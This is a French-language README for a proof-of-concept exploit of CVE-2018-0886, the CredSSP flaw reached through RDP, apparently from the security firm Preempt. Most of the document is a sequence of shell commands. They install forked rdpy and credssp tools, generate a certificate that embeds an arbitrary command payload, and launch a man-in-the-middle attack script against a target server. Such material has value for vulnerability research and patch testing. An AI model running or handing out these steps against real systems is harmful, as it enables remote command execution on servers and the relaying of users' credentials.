
Un code démontrant CVE-2018-0886
Ceci est un code de preuve de concept (PoC) pour exploiter CVE-2018-0886. Il ne devrait être utilisé qu'à des fins éducatives. Il repose sur un fork du projet rdpy (https://github.com/preempt/rdpy), permettant également le relais credssp.
Écrit par Eyal Karni, Preempt [email protected]
Si vous utilisez Ubuntu 14, vérifiez le fichier d'installation.. Cela a été testé sur Ubuntu 16.04.
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
Exportez un certificat adapté à l'authentification serveur à partir de n'importe quel domaine. (Il est utilisé pour RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
Pour générer un certificat qui exploite la vulnérabilité (contient la charge utile), utilisez :
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert est le certificat exporté à l'étape 1. exploitc.pem ,exploitk.pem sont respectivement le certificat généré et la clé privée)
Pour exécuter le script d'attaque :
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
Plus de détails figurent dans la section usage des scripts(--help).